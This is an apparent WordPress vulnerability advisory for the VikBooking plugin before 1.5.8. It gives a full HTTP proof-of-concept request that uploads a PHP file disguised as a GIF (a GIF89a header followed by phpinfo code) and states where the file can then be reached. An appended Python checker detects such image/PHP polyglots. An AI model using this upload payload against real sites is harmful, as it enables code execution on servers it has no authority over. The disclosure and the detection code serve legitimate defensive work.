WordPress Plugin Vulnerabilities

VikBooking Hotel Booking Engine & PMS < 1.5.8 - Admin+ PHP File Upload

Description

The plugin does not properly validate uploaded images, allowing high-privilege users such as administrators to upload PHP files disguised as images and containing malicious PHP code.

Proof of Concept

Edit/add a Characteristic (/wp-admin/admin.php?option=com_vikbooking&task=carat) and upload a fake GIF with PHP code in it as the Characteristic Image:

POST /wp-admin/admin.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------119541905442224294322517652959
Content-Length: 1469
Connection: close
Cookie: [admin+]
Upgrade-Insecure-Requests: 1

-----------------------------119541905442224294322517652959
Content-Disposition: form-data; name="caratname"

WiFi
-----------------------------119541905442224294322517652959
Content-Disposition: form-data; name="caraticon"; filename="phpinfo.php"
Content-Type: image/gif

GIF89a;
<?php phpinfo() ?>

-----------------------------119541905442224294322517652959
Content-Disposition: form-data; name="resizeto"

250
-----------------------------119541905442224294322517652959
Content-Disposition: form-data; name="carattextimg"

<i class="fas fa-wifi vbo-icn-carat vbo-pref-color-text"></i>
-----------------------------119541905442224294322517652959
Content-Disposition: form-data; name="ordering"

1
-----------------------------119541905442224294322517652959
Content-Disposition: form-data; name="task"

updatecarat
-----------------------------119541905442224294322517652959
Content-Disposition: form-data; name="whereup"

1
-----------------------------119541905442224294322517652959
Content-Disposition: form-data; name="option"

com_vikbooking
-----------------------------119541905442224294322517652959
Content-Disposition: form-data; name="vikwp_nonce"

2817d7732a
-----------------------------119541905442224294322517652959--


The uploaded PHP file will then be reachable at https://example.com/m/wp-content/plugins/vikbooking/site/resources/uploads/phpinfo.php
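As an added defensive example, not part of the advisory or of the plugin's own code, the check below shows the validation the description says is missing: an allowlisted extension, a content signature that matches that extension, and no PHP open tag anywhere in the bytes. It also walks an uploads directory so an existing install can be audited for files of this shape; the sample bytes are constructed and the directory path is an assumption.

```python
"""Flag image-upload polyglots: files with an executable extension,
image bytes that carry a PHP open tag, or a signature/extension mismatch."""
import re
from pathlib import Path

# Extensions an image upload handler should accept.
IMAGE_EXT = {".gif", ".jpg", ".jpeg", ".png"}
# Leading bytes of each accepted format, mapped to the extensions it may use.
MAGIC = {
    b"GIF87a": {".gif"},
    b"GIF89a": {".gif"},
    b"\xff\xd8\xff": {".jpg", ".jpeg"},
    b"\x89PNG\r\n\x1a\n": {".png"},
}
# "<?php" (word boundary) or the short echo tag "<?=", case-insensitive.
PHP_TAG = re.compile(rb"<\?(php\b|=)", re.IGNORECASE)

def check_upload(filename: str, data: bytes) -> list[str]:
    """Return the reasons an upload should be rejected; an empty list means it passed."""
    reasons = []
    ext = Path(filename).suffix.lower()
    if ext not in IMAGE_EXT:
        reasons.append(f"extension {ext or '(none)'} not in image allowlist")
    allowed = next((exts for magic, exts in MAGIC.items() if data.startswith(magic)), None)
    if allowed is None:
        reasons.append("no known image signature")
    elif ext in IMAGE_EXT and ext not in allowed:
        reasons.append(f"extension {ext} does not match content signature")
    if PHP_TAG.search(data):
        reasons.append("PHP open tag found inside image data")
    return reasons

def scan_upload_dir(root: Path) -> dict[str, list[str]]:
    """Audit every file under an uploads directory and report the ones that fail."""
    findings = {}
    for path in root.rglob("*"):
        if path.is_file():
            reasons = check_upload(path.name, path.read_bytes())
            if reasons:
                findings[str(path)] = reasons
    return findings

# Constructed samples: the polyglot body from the request above, and a minimal 1x1 GIF.
POLYGLOT = b"GIF89a;\n<?php phpinfo() ?>\n"
CLEAN_GIF = (b"GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\xff\xff\xff"
             b"!\xf9\x04\x01\x00\x00\x00\x00,\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02D\x01\x00;")

if __name__ == "__main__":
    print(check_upload("phpinfo.php", POLYGLOT))   # two reasons: extension and PHP tag
    print(check_upload("wifi.gif", CLEAN_GIF))     # []
    # Assumed path; point it at the plugin's uploads directory to audit an install.
    print(scan_upload_dir(Path("wp-content/plugins/vikbooking/site/resources/uploads")))
```

Note that the PHP tag scan is the check that catches the PoC even when the file is renamed to .gif, because a web server that executes .gif files through PHP, or a later rename, would otherwise turn a "valid" image into code.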


Affects Plugins

Fixed in 1.5.8

Miscellaneous

Original Researcher
Gabriel3476
Submitter
Gabriel3476
Verified
Yes

Timeline

Publicly Published
2022-04-21
Added
2022-04-21
Last Updated
2022-04-22